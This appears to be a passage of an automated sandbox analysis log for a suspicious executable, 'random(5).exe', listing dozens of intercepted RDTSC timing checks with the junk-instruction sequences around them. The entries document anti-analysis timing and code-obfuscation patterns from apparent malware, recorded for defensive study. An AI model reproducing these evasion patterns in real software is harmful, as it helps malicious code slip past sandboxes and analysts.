    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 176B9BC second address: 176B9D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F519CFC89C2h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 176B9D7 second address: 176B9DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17726D8 second address: 17726F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 jmp 00007F519CFC89BCh 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop ebx 0x0000000e js 00007F519CFC89BEh 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1772C55 second address: 1772C6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C384h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1775F3D second address: 1775F4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F519CFC89B6h 0x0000000a jl 00007F519CFC89B6h 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 16EAFF9 second address: 16EB021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F519CD4C381h 0x00000009 jmp 00007F519CD4C383h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1732F84 second address: 1732F9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1732F9E second address: 1732FA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1732FA4 second address: 1732FA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17330E0 second address: 17330E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17330E7 second address: 17330FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 ja 00007F519CFC89B6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 push edi 0x00000013 pop edi 0x00000014 popad 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17330FC second address: 1733102 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 173331D second address: 1733321 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1733321 second address: 173332D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 173332D second address: 1733331 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 173342C second address: 1733435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1733435 second address: 1733439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1733439 second address: 17334B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C386h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D28DBh], esi 0x00000011 push 00000004h 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F519CD4C378h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D1C26h], ebx 0x00000033 nop 0x00000034 pushad 0x00000035 je 00007F519CD4C37Ch 0x0000003b ja 00007F519CD4C376h 0x00000041 pushad 0x00000042 push edi 0x00000043 pop edi 0x00000044 jmp 00007F519CD4C389h 0x00000049 popad 0x0000004a popad 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17334B9 second address: 17334BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17334BF second address: 17334C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17334C4 second address: 17334CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17334CA second address: 17334CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 173388D second address: 1733891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1733891 second address: 1733895 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 177E906 second address: 177E90C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 177E90C second address: 177E916 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 177E916 second address: 177E91A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 177E91A second address: 177E923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 177E923 second address: 177E936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 jng 00007F519CFC89B6h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 177EA9A second address: 177EAAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F519CD4C37Dh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 177EDE3 second address: 177EE08 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F519CFC89B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F519CFC89C4h 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1781632 second address: 178163A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 178163A second address: 1781658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F519CFC89C3h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1781231 second address: 178123A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17813C8 second address: 17813CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17843B9 second address: 17843C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F519CD4C376h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1787E08 second address: 1787E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1787E13 second address: 1787E19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1787E19 second address: 1787E29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 ja 00007F519CFC89D9h 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 178811B second address: 1788123 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1788123 second address: 1788127 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17883E2 second address: 17883F5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F519CD4C37Ch 0x00000008 push ecx 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 178B82C second address: 178B832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 178B832 second address: 178B836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 178B836 second address: 178B83C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 178B9D9 second address: 178B9DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 178BC56 second address: 178BC73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C4h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 178BDAD second address: 178BDB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 178BDB3 second address: 178BDBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 178BDBA second address: 178BDC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 178C08E second address: 178C092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1791F70 second address: 1791F74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1791F74 second address: 1791F8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F519CFC89BCh 0x0000000b popad 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1791F8B second address: 1791F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1791F93 second address: 1791FAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F519CFC89C5h 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 179080C second address: 1790817 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F519CD4C376h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1790AE4 second address: 1790AE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1790C54 second address: 1790C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F519CD4C385h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1790C6D second address: 1790C71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1791083 second address: 1791087 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1791087 second address: 17910B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jns 00007F519CFC89B6h 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push edi 0x00000014 pop edi 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 popad 0x00000018 je 00007F519CFC89C6h 0x0000001e jmp 00007F519CFC89BAh 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17910B1 second address: 17910C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F519CD4C37Ch 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17910C4 second address: 17910D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F519CFC89BCh 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1791C13 second address: 1791C60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F519CD4C389h 0x0000000a pushad 0x0000000b jmp 00007F519CD4C384h 0x00000010 pushad 0x00000011 jmp 00007F519CD4C381h 0x00000016 js 00007F519CD4C376h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 179B343 second address: 179B349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 179B349 second address: 179B368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F519CD4C388h 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 179B368 second address: 179B380 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F519CFC89BDh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1799448 second address: 179946B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F519CD4C387h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17995B0 second address: 17995B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17995B4 second address: 17995D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F519CD4C37Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnl 00007F519CD4C37Eh 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 179990E second address: 1799929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F519CFC89C2h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1799929 second address: 179994C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F519CD4C387h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 179994C second address: 1799950 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1799C43 second address: 1799C47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1799C47 second address: 1799C4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1799C4B second address: 1799C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1799C5B second address: 1799C61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1799C61 second address: 1799C65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1799F74 second address: 1799F8D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F519CFC89B8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F519CFC89BDh 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 179A271 second address: 179A27F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F519CD4C376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 179A27F second address: 179A285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 179A285 second address: 179A289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 179A510 second address: 179A518 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 179A518 second address: 179A51C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 179A81F second address: 179A825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 179FC5D second address: 179FC61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 179FC61 second address: 179FC6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 179FC6B second address: 179FC6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 179FC6F second address: 179FC75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 16FA1CF second address: 16FA1D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 16FA1D5 second address: 16FA1DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 16FA1DA second address: 16FA1F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Ah 0x00000007 push edi 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jp 00007F519CD4C376h 0x00000010 pop edi 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 16FA1F7 second address: 16FA1FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17A12BE second address: 17A12C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17A12C4 second address: 17A12C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17A12C9 second address: 17A12D0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17A12D0 second address: 17A12F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F519CFC89C7h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17A4B7F second address: 17A4B85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17A4E17 second address: 17A4E2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F519CFC89C2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17A4F8E second address: 17A4F94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17AD095 second address: 17AD099 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
